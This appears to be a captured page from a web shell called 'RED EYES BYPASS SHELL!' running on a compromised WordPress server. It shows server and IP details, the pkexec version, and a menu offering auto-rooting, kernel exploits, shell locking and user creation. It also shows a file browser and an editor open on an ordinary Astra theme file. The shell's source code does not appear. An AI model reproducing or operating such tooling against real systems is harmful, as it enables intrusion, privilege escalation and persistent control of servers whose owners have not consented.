Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
N008 /
wp-content /
themes /
astra /
inc /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
builder
[ DIR ]
drwxr-xr-x
deprecated
[ DIR ]
drwxr-xr-x
markup
[ DIR ]
drwxr-xr-x
class-astra-admin-helper.php
2.08
KB
-rw-r--r--
class-astra-admin-settings.php
24.81
KB
-rw-r--r--
class-astra-attr.php
2.64
KB
-rw-r--r--
class-astra-enqueue-scripts.php
25.08
KB
-rw-r--r--
class-astra-icons.php
11.01
KB
-rw-r--r--
class-astra-theme-options.php
34.08
KB
-rw-r--r--
class-astra-walker-page.php
4.51
KB
-rw-r--r--
class-astra-wp-editor-css.php
58.93
KB
-rw-r--r--
class-gutenberg-editor-css.php
77.97
KB
-rw-r--r--
class-theme-strings.php
4.94
KB
-rw-r--r--
common-functions.php
60.07
KB
-rw-r--r--
index.php
111
B
-rw-r--r--
sidebar-manager.php
2.19
KB
-rw-r--r--
theme-hooks.php
8.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-manager.php
<?php /** * Sidebar Manager functions * * @package Astra * @link https://wpastra.com/ * @since Astra 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Site Sidebar */ if ( ! function_exists( 'astra_page_layout' ) ) { /** * Site Sidebar * * Default 'right sidebar' for overall site. */ function astra_page_layout() { $supported_post_types = Astra_Posts_Structure_Loader::get_supported_post_types(); if ( is_singular() ) { // If post meta value is empty, // Then get the POST_TYPE sidebar. $layout = astra_get_option_meta( 'site-sidebar-layout', '', true ); // If post meta value is empty or in editor and sidebar set as default. if ( empty( $layout ) ) { $post_type = strval( get_post_type() ); if ( in_array( $post_type, $supported_post_types ) ) { $layout = astra_get_option( 'single-' . $post_type . '-sidebar-layout' ); } if ( 'default' == $layout || empty( $layout ) ) { // Get the global sidebar value. // NOTE: Here not used `true` in the below function call. $layout = astra_get_option( 'site-sidebar-layout' ); } } } else { if ( is_search() ) { // Check only post type archive option value. $layout = astra_get_option( 'archive-post-sidebar-layout' ); $search_sidebar_layout = astra_get_option( 'ast-search-sidebar-layout', 'default' ); $layout = 'default' !== $search_sidebar_layout ? $search_sidebar_layout : $layout; if ( 'default' == $layout || empty( $layout ) ) { // Get the global sidebar value. // NOTE: Here not used `true` in the below function call. $layout = astra_get_option( 'site-sidebar-layout' ); } } else { $post_type = astra_get_post_type(); $layout = ''; if ( in_array( $post_type, $supported_post_types ) ) { $layout = astra_get_option( 'archive-' . $post_type . '-sidebar-layout' ); } if ( 'default' == $layout || empty( $layout ) ) { // Get the global sidebar value. // NOTE: Here not used `true` in the below function call. $layout = astra_get_option( 'site-sidebar-layout' ); } } } return apply_filters( 'astra_page_layout', $layout ); } }
Close